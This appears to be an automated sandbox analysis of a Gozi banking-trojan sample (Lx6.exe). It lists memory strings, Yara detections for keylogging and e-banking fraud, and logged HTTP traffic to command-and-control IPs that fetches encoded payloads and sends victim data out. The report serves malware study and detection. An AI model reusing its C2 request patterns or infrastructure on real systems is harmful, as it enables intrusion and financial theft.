00000029.00000003.705458137.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000003.797117196.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000003.712648005.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000003.712982128.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.856230458.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000003.767939746.000001993459C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000003.765039957.000001993459C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000003.765207667.000001993459C000.00000004.00000020.00020000.00000000.sdmp, 
csc.exe, 0000003E.00000002.795032491.000001993459C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: RuntimeBroker.exe, 00000013.00000002.860670049.000002240CD05000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000002.858831162.000001D023E05000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001F.00000002.856155256.000001489B505000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.856115183.00000191D3AAF000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000043.00000002.778448031.000001FA9DC8D000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000059.00000002.827104369.000001AF8BB9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://curlmyip.net
Source: powershell.exe, 0000002D.00000002.856115183.00000191D3AAF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://curlmyip.net1g
Source: RuntimeBroker.exe, 00000013.00000002.860670049.000002240CD05000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000002.858831162.000001D023E05000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001F.00000002.856155256.000001489B505000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000043.00000002.778448031.000001FA9DC8D000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000059.00000002.827104369.000001AF8BB9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://curlmyip.net1g71lXXnduT6klnGfile://c:
Source: Lx6.exe, 00000000.00000003.451792745.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, Lx6.exe, 00000000.00000003.442938704.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000003.448346739.0000021F4E42C000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000013.00000002.860622856.000002240CD02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000002.858783348.000001D023E02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001F.00000002.856104544.000001489B502000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000003.682986739.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000003.708638922.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000002.721107955.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000003.705598553.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000003.705458137.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000003.797117196.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000003.712648005.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000003.712982128.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.856230458.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000003.767939746.000001993459C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000003.765039957.000001993459C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000003.765207667.000001993459C000.00000004.00000020.00020000.00000000.sdmp, 
csc.exe, 0000003E.00000002.795032491.000001993459C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: cvtres.exe, 00000059.00000002.827104369.000001AF8BB9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ipinfo.io/ip
Source: RuntimeBroker.exe, 0000001B.00000000.629410549.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000000.609610192.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000000.634295929.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000002.854225233.000001D021902000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ns.adobe.cmg
Source: RuntimeBroker.exe, 0000001B.00000000.629410549.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000000.609610192.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000000.634295929.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000002.854225233.000001D021902000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ns.adobe.ux
Source: RuntimeBroker.exe, 0000001B.00000000.629410549.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000000.609610192.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000000.634295929.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000002.854225233.000001D021902000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ns.adobp/E
Source: RuntimeBroker.exe, 0000001B.00000000.629410549.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000000.609610192.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000000.634295929.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000002.854225233.000001D021902000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ns.micro/1
Source: powershell.exe, 00000004.00000002.800187372.0000021F455E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ogp.me/ns#
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ogp.me/ns/fb#
Source: powershell.exe, 00000004.00000002.561587239.0000021F35781000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.558784999.0000021F35581000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.861404017.00000191D4411000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/d7cb56b9-/direction=ltr.l
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA12OBYj.img?h=368&
Source: powershell.exe, 00000004.00000002.561587239.0000021F35781000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 0000000E.00000000.541728807.0000000008260000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.481741357.0000000008260000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.517838181.0000000008260000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.msn.com/de-ch
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.msn.com/de-ch/
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://browser.events.data.msn.com/OneCollector/1.0/t.js?qsp=true&anoncknm=%22%22&name=%22M
Source: powershell.exe, 00000004.00000002.800187372.0000021F455E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.800187372.0000021F455E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.800187372.0000021F455E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: Lx6.exe, 00000000.00000003.345037637.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Lx6.exe, 00000000.00000003.345194769.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Lx6.exe, 00000000.00000003.388832296.000000000131B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: powershell.exe, 00000004.00000002.561587239.0000021F35781000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&ct=1665493296&rver=7.0.6730.0&am
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/logout.srf?ct=1665493297&rver=7.0.6730.0&lc=1033&id=1184&lru=
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/me.srf?wa=wsignin1.0&rpsnv=13&ct=1665493296&rver=7.0.6730.0&w
Source: powershell.exe, 00000004.00000002.800187372.0000021F455E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://outlook.com/
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.hoeren-heute.ch/d/horizon_reveal/?act=ACT0000044974ACT&utm_source=mcrs&utm_mediu
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.hoeren-heute.ch/d/nulltarif_offer/?act=ACT0000045540ACT&utm_source=mcrs&utm_medi
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/de-ch/finanzen/nachrichten/angebotsmieten-in-allen-kantonen-gestiegen/ar-AA12OUn
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/de-ch/nachrichten/schweiz/ja-er-will-r%c3%b6sti-gibt-seine-kandidatur-bekannt/ar
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/de-ch/news/other/bewaffnete-m%c3%a4nner-%c3%bcberfallen-luzerner-bar/ar-AA12NkUo
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/de-ch/news/other/bundesratswahl-alle-augen-richten-sich-nach-bern/ar-AA12LMZu?oc
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/de-ch/news/other/r%c3%a4uber-muss-nach-%c3%bcberfallserie-mehr-als-drei-jahre-in
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/de-ch/news/other/wie-deine-abgeschnittenen-haare-seen-s%c3%a4ubern-k%c3%b6nnen/a
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/de-ch/shopping
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/de-ch/sport/other/fcz-bleibt-letzter-lugano-schl%c3%a4gt-basel-servette-und-luze
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/de-ch/sport/other/z%c3%bcrich-und-winterthur-zeigten-wo-sie-stehen/ar-AA12LPId?o
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.tippsundtricks.co/lifehacks/dose-offnen/?utm_campaign=DECH-Dose&utm_source=MSN&u
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.tippsundtricks.co/lifehacks/dosenoeffner-falsch-benutzt/?utm_campaign=DECH-canopen&u
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.tippsundtricks.co/saubermachen/reinige-dusche-spulmaschinentab/?utm_campaign=DECH-spulit
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.tippsundtricks.co/sonstiges/diese-96-jahre-alte-dame-will-ihr-haus-verkaufen-wenn-du-dir
Source: unknown DNS traffic detected: queries for: tel12.msn.com
Source: global traffic HTTP traffic detected: GET /doorway/j2Kh1F01rzc/C8YfqfqOL0fd_2/Faja_2BeyQazoCIhY8EM9/jtWW9dUBZLJi2O8c/5bSyBdVOxMEWaUX/ShuObsG4WHyjfvJOvS/7Etsx6H8b/xJ9ufj3B90qCwQfbGxOr/E6EEqhpsHuAJvMjEWxJ/bbt9tD_2FAMRZ0X6mUy9CA/ykkOKoxULnECB/ejdchRP6/xdR6yPCPWIpLVR5uBosZgJc/ZByIsZgREK/Fk_2Feeg2_2Bk9KT9/iLNnOQl_2B8z/5ltZk0GHQaA/kR9XvP8sc8BQlA/LXFn1z6p/VlTMdML3/9.drr HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.225.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /doorway/BIhFC1DHq0NxSqN_2Fq5v/hicggKY4SgwJPP6D/F4xxZuIhTddt0HO/A_2B6u1ukXktqk9I1N/03tCA2eZF/F2lX7Km3UL6Oc40qXR7I/S_2Bu_2F1gAnwxNSHl_/2B_2BIw1VXdQgjLWDGSvzH/6KsVMipemRsxc/s39L4jXr/llySx2Z4YWz6hWH3fehvPN_/2B4i_2B9D9/MRxPcto8_2FTKi6Ul/Lo0znElngJCM/KVK8xvLBVm9/FogU94tV1Oz3NS/xOy9YP2f0yNELqTpaSapG/CGthTWmcja_2By_2/BWnMuFbG2_2/FigtxC.drr HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.225.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /doorway/yww9t6EI6u3knXcyyJCm/k0PaEmMkYIgXI64U0Xz/raOOkTYJ1OffkP1wEWgVkk/KDIFR_2BFO6sY/C2PaBaPa/Sss01ix_2BadgeHfS9wHDYB/Y8ru3rQs3i/_2BVL_2F9XZIKlCI8/B1oNU6QkNaWX/PsYuvkPEO_2/F4YFTJXJbymKQ2/fHoiICtdHiiOAaF3y2_2B/YuR2etKSof76kp2a/rN6zIbIDcAsv1vB/ZbVJT7_2F5CmNDvPiV/bnGga5QOC/6JDIjD6kBTEGU_2FDRCY/QI5i_2BmMOmGPPVMPTI/LhHL9V2_2/Bt.drr HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.225.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: www.msn.com
Source: global traffic HTTP traffic detected: GET /de-ch/ HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: www.msn.comCookie: PreferencesMsn=eyJIb21lUGFnZSI6eyJTdHJpcGVzIjpbXSwiTWVTdHJpcGVNb2R1bGVzIjpbXSwiTWFya2V0Q29uZmlndXJhdGlvbiI6eyJNYXJrZXQiOiJkZS1jaCIsIlN1cHByZXNzUHJvbXB0IjpmYWxzZSwiUHJlZmVycmVkTGFuZ3VhZ2VDb2RlIjoiZGUtZGUiLCJDb3VudHJ5Q29kZSI6IkNIIn19LCJFeHBpcnlUaW1lIjo2MzgzMjYyNjI0NTk3NzIzMjYsIlZlcnNpb24iOjF90; marketPref=de-ch
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: www.msn.comCookie: PreferencesMsn=eyJFeHBpcnlUaW1lIjo2MzgzMjYyNjI0NjE0OTA5OTMsIlZlcnNpb24iOjF90; marketPref=de-ch
Source: global traffic HTTP traffic detected: GET /de-ch/ HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: www.msn.comCookie: PreferencesMsn=eyJIb21lUGFnZSI6eyJTdHJpcGVzIjpbXSwiTWVTdHJpcGVNb2R1bGVzIjpbXSwiTWFya2V0Q29uZmlndXJhdGlvbiI6eyJNYXJrZXQiOiJkZS1jaCIsIlN1cHByZXNzUHJvbXB0IjpmYWxzZSwiUHJlZmVycmVkTGFuZ3VhZ2VDb2RlIjoiZGUtZGUiLCJDb3VudHJ5Q29kZSI6IkNIIn19LCJFeHBpcnlUaW1lIjo2MzgzMjYyNjI2MjMzNjk0MDQsIlZlcnNpb24iOjF90; marketPref=de-ch
Source: global traffic HTTP traffic detected: GET /doorway/uRv392Rtz866/nti_2ByAL1r/R8CkJ_2BndSyRx/sIG44fcYL4SmExCi0ACI7/oER1nF0Bt2Tpxtf8/pvf2xzyDmqE4uH6/atElJIeiaCGvRyaYTW/O_2Bb7sZx/7GOqqpJyOKdZvhgFoplL/gFpgB_2BgQj834VvyfM/T9x1pruFqGyVhzjoXgN9Yh/z5CHc_2FavqJW/MXQOJsyO/VzU5_2FcjvOlXkGZhClQ7RM/oSy78PufE2/FJvd3_2FTRM8OrG4Y/ryVNLZn8s_2B/KVoRzz7Jpgf/a.gif HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 194.76.225.61Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /doorway/bRzGSLjweAbH/PVfy51BTQqO/lWZDAcFYwrYEOw/P1069Ds4xjESTY05mmd1_/2ByVzroc4cimG4A8/PzkyhLRGCX0aFw5/Jtve4MdzfQJPkPgA2k/NTDeHmvoJ/_2B7yHjl7zuPv_2Brki5/vNALnLBqmQChxlgwPJX/YMRMYrIxai4T4_2BKHDViB/Hv_2BBzVFkjNS/FgarEETc/294Vv6pgzz58Ssm8O4z7jEg/g3Dq3u6_2B/toSBBRie0B5BZcweG/l7bNSU7DgvscLKrC/Sp3p.drr HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 194.76.225.61Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /doorway/b6wMkPt4iWosnbXK8RWvn/wQ2bkOJqcdbdcNhg/tg0Z3ks_2FXcWvb/njy6I8DMVjfhayfvGk/AHmjUevns/VlDNJo0_2B7BLsOhWepg/SFW_2F2h4VyZK2j7bvO/pwSb1f2R_2B4_2FNz_2Fk5/AtvhdDlWA69Wm/XRrBsoYg/JvQOOWqnl_2BSVvJf6ZjHAL/wi1PXKezi1/T9UASDBDRIpvMBY_2/FoQu0ao4VHCM/ZdN_2Bl0_2B/R_2BeX3PT9oLhg/3PUDsQH9gNCwUAZWN3W4_/2BLY_2F_2F1_2F3U/UklFvieJ/d91ke0Bg/KsQU9iQ.drr HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 194.76.225.61Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /doorway/8DqiRUYpN1g/urg4gk8belU2Hp/6R_2FaNTBZnVkLTOVWhaX/cRir_2FDANkaaRhV/ClRbP8o7eYAfvcj/15sk13GdbMsMo5M_2F/JnE3OOrX1/Yn3LiAEserhxrqJvZEPb/e6YS2cNRsGxIjllZdqY/7_2FRYI58Sw6j4ExBQcowc/5qMbTW7lnZmjK/j8COe_2F/4naQldFBQDlP42ux0j7rpPZ/VYnkJGg8xi/iWRQWDs2GHiDVoqIT/U1cLh8zIJ54C/3jdFHxCPndA/7QWrJ8HiTz2ZrO/n84c0VWLTOO/rD8u.gif HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 194.76.225.61Content-Length: 54Connection: Keep-AliveCache-Control: no-cacheData Raw: 31 31 2d 31 30 2d 32 30 32 32 20 31 35 3a 30 34 3a 32 35 20 7c 20 22 30 78 61 61 61 34 39 34 65 37 5f 36 33 31 34 63 64 34 36 63 34 66 66 35 22 20 7c 20 30 0d 0a Data Ascii: 11-10-2022 15:04:25 | "0xaaa494e7_6314cd46c4ff5" | 0
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.225.60
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <link rel="preconnect" href="img-s-msn-com.akamaized.net" /><link rel="preconnect" href="c.msn.com" /><link rel="preconnect" href="c.msn.cn" /><link rel="preconnect" href="http://www.bing.com" /><link rel="preconnect" href="//browser.events.data.msn.com" /><link rel="dns-prefetch" href="img-s-msn-com.akamaized.net" /><link rel="dns-prefetch" href="c.msn.com" /><link rel="dns-prefetch" href="c.msn.cn" /><link rel="dns-prefetch" href="http://www.bing.com" /><link rel="dns-prefetch" href="//browser.events.data.msn.com" /><link rel="canonical" href="http://www.msn.com/de-ch/" /> <title>MSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365</title> equals www.hotmail.com (Hotmail)

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match File source: Process Memory Space: Lx6.exe PID: 1172, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4292, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 3124, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4372, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4552, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 5832, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 1920, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6064, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csc.exe PID: 5836, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cvtres.exe PID: 1716, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csc.exe PID: 3536, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cvtres.exe PID: 5240, type: MEMORYSTR
Source: Yara match File source: 0.3.Lx6.exe.d294a0.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Lx6.exe.420000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.Lx6.exe.d294a0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.Lx6.exe.109d4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.Lx6.exe.109d4a0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.Lx6.exe.111c4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.Lx6.exe.1148948.2.raw.unpack, type: UNPACKEDPE

E-Banking Fraud

Source: Yara match File source: 0000002D.00000002.856230458.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000003.705458137.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.682832881.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000043.00000003.775181381.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000058.00000003.803740044.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.451792745.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.344881693.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.344788105.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.389768028.000000000119B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000003.708468891.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000043.00000003.775368587.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.682410000.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.858783348.000001D023E02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.682621929.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.442938704.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000002.795032491.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Lx6.exe PID: 1172, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4292, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 3124, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4372, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4552, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 5832, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 1920, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6064, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csc.exe PID: 5836, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cvtres.exe PID: 1716, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csc.exe PID: 3536, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cvtres.exe PID: 5240, type: MEMORYSTR
Source: C:\Windows\explorer.exe Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\7C7B.bin\AuthRoot.pfx
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\7C7B.bin\Root.pfx
Source: cmd.exe Process created: 51

System Summary

Source: 00000000.00000003.345037637.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.345037637.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
